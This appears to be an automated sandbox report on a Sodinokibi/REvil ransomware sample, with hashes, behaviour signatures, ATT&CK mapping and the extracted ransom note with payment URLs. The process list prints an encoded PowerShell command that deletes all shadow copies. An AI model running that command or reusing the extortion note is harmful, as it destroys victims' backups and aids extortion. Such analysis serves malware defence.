Overview

overview

10

Static

static

10

89a77693e6...f6.exe

windows7_x64

10

89a77693e6...f6.exe

windows10_x64

10

Analysis

  • max time kernel
    135s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    89a77693e6b0f16c8b51c02c2895622ad4bd4ea3fed11c069d19433a51aa55f6.exe

  • Size

    115KB

  • MD5

    186fc63770de2c15829a415ed0504abe

  • SHA1

    19f7900a62ec2227f73ec3423767f3959748002c

  • SHA256

    89a77693e6b0f16c8b51c02c2895622ad4bd4ea3fed11c069d19433a51aa55f6

  • SHA512

    0bbe0f7647c4bb8495ef1a057d66510ef50fb916ed3eb48c74b4686eae441652b0c148511dfd97c4f79282b48e952e08929c99bff96ee1d716c39ee304d6c331

Score
10/10
sodinokibiransomware

Malware Config

Extracted

Path

C:\9140ae0483-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 9140ae0483. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EE02D38AEC0B9C2B 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/EE02D38AEC0B9C2B Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: cobO1rQRVdebQ+xKhgZOvl9FZZ16B5RRN6aRHoczbU7Zm/6Qz/DAGYaVqdnVW/Dw g9h/r2RN++86InOcV7IbQLvK4e9zoA2gTy2lbB217MSUVK3TbgbmFvwaVA2KzHQ+ AmYPXUoWjrh8z6KZnviVJZya78hx1ifrkeyfJQePSG/1YY51UfZhBxwoInn7Q8jQ 7zdGFXMXK6Fu/7NIFL8D6cnOz1ZcVrljW191ep2est1h+g8vTh5nYh3Bz1HVK8+M rEvnMUq5xGnIT9WjjaOoEuyNU89zO3d+OSeRj+dSCzKIvPvaZlwwRdXg6Sm5RDDI KM3m7a45jqvuuygwhXvbhAzZ+0btxeGlxgE3vxtjMB0sjVjU9FEPq94busl7mxLU mdF1M/Dkjf8Lk3myaaEuUjmy+rESW15IAIG1ZrReTi5Kb4YUZKxWkAVvuvxqcPcA hagdmcWHvJuz1OBEwWI1uILIp65yLyXSeAemdvaBDsB87UwERMy4PncLrUSD47vy Kv1clHDlORGHG4okZQF08uIai2LDRDGAA8luADcsCrcwyQyhmzjbwU/E7kGM+23E v8ESUiud4R6APUZVhMT4XFXnajWb2DM1sr6rarc59ZfphWdK7yEA/I4OlfAWnmZD v1n40yeVb8V9ut0BoCXyN4yMQS0SybWoik7Xu3l0ZBim01SjonrQqEzml/NLU7UE Mh/4sLwenHZNxdrltmpEqqDPbaAsTLBm+pib1o9ZwedaODAvx4nBp1W+Q/gAwHMU un49naaSC+UzBT8zshjaS/B0+0QMLaGLu2zS2kRKsr1hy4cbhHJ2sktJCD7bVzhJ 4rJmh1B/ozR7pTsXB3Djw0OQ+7mtLdKZK1n9GJyXEgv00Fi9Wi7H8iyw63k5Q3Dm T4iXMIQ8g7dXim4vyEwGmbRI+ZcU50Yc0k9txct+4RuVWPhNyes9nCgqQ9NWL1vu N3tTwnzvuCZWCNa1gwfT/C0VNZFSD9U2Oa1ise0g5fP4zalY4CPwteuNTF3o9p1Q YADBVp2n2tZOdkEZoDflpz8Iqy1TjW/vaxdvuySa4f4bG4Hf76vXjRl7cb5UkLIN 97ZOZPJGhoY2RjFr6oJNvrkV5uLYhxCZy6hxcaZ5rEYNFhEKuE1W/ZPtJaDsST+d n8IOghlGNh6cnP+9TIcF0oDHNDFkcdHScF0NvpCVvj1MzCSUopc2pTyNf6/+IfMg kvTa7ziN5saScsM3v/q8Q+//JB1hkaddr9tIE2rI9nmN7bLiVCTpd8nurxk4RsbA fptiupSc6kHLI6oJiDVclLWiYa3Dbinjchhjgiyr2oc= Extension name: 9140ae0483 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EE02D38AEC0B9C2B

http://decryptor.cc/EE02D38AEC0B9C2B

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 33 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\89a77693e6b0f16c8b51c02c2895622ad4bd4ea3fed11c069d19433a51aa55f6.exe
    "C:\Users\Admin\AppData\Local\Temp\89a77693e6b0f16c8b51c02c2895622ad4bd4ea3fed11c069d19433a51aa55f6.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1132
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1168
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1928

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1132-56-0x000007FEFC371000-0x000007FEFC373000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1132-59-0x0000000002722000-0x0000000002724000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1132-58-0x0000000002720000-0x0000000002722000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1132-60-0x0000000002724000-0x0000000002727000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1132-57-0x000007FEF3780000-0x000007FEF42DD000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/1132-61-0x000000000272B000-0x000000000274A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1316-55-0x0000000076851000-0x0000000076853000-memory.dmp
      Filesize

      8KB

      Download